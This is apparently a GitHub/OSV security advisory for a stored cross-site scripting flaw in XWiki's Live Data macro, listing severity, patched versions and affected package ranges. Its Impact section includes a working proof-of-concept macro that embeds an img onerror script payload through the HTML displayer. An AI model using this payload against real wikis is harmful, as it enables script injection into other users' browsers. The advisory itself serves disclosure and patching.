GHSA-32fq-m2q5-h83g

Suggest an improvement
Source
https://github.com/advisories/GHSA-32fq-m2q5-h83g
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-32fq-m2q5-h83g/GHSA-32fq-m2q5-h83g.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-32fq-m2q5-h83g
Aliases
Published
2023-03-03T22:53:51Z
Modified
2023-11-08T04:12:01.901090Z
Severity
  • 8.9 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L CVSS Calculator
Summary
XWiki-Platform vulnerable to stored Cross-site Scripting via the HTML displayer in Live Data
Details

Impact

A user without script rights can introduce a stored XSS by using the Live Data macro.

For instance:

{{liveData id="movies" properties="title,description"}}
{
  "data": {
    "count": 1,
    "entries": [
      {
        "title": "Meet John Doe",
        "url": "https://www.imdb.com/title/tt0033891/",
        "description": "<img onerror='alert(1)' src='foo' />"
      }
    ]
  },
  "meta": {
    "propertyDescriptors": [
      {
        "id": "title",
        "name": "Title",
        "visible": true,
        "displayer": {"id": "link", "propertyHref": "url"}
      },
      {
        "id": "description",
        "name": "Description",
        "visible": true,
        "displayer": "html"
      }
    ]
  }
}
{{/liveData}}

Patches

This has been patched in XWiki 14.9, 14.4.7, and 13.10.10.

Workarounds

No known workaround.

References

https://jira.xwiki.org/browse/XWIKI-20143

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira * Email us at Security ML

Database specific
{
    "nvd_published_at": "2023-03-02T18:15:00Z",
    "github_reviewed_at": "2023-03-03T22:53:51Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-79"
    ]
}
References

Affected packages

Maven / org.xwiki.platform:xwiki-platform-livedata-macro

Package

Name
org.xwiki.platform:xwiki-platform-livedata-macro
View open source insights on deps.dev
Purl
pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro

Affected ranges

Type
ECOSYSTEM
Events
Introduced
12.10
Fixed
13.10.10

Maven / org.xwiki.platform:xwiki-platform-livedata-macro

Package

Name
org.xwiki.platform:xwiki-platform-livedata-macro
View open source insights on deps.dev
Purl
pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro

Affected ranges

Type
ECOSYSTEM
Events
Introduced
14.0
Fixed
14.4.7

Maven / org.xwiki.platform:xwiki-platform-livedata-macro

Package

Name
org.xwiki.platform:xwiki-platform-livedata-macro
View open source insights on deps.dev
Purl
pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro

Affected ranges

Type
ECOSYSTEM
Events
Introduced
14.5
Fixed
14.9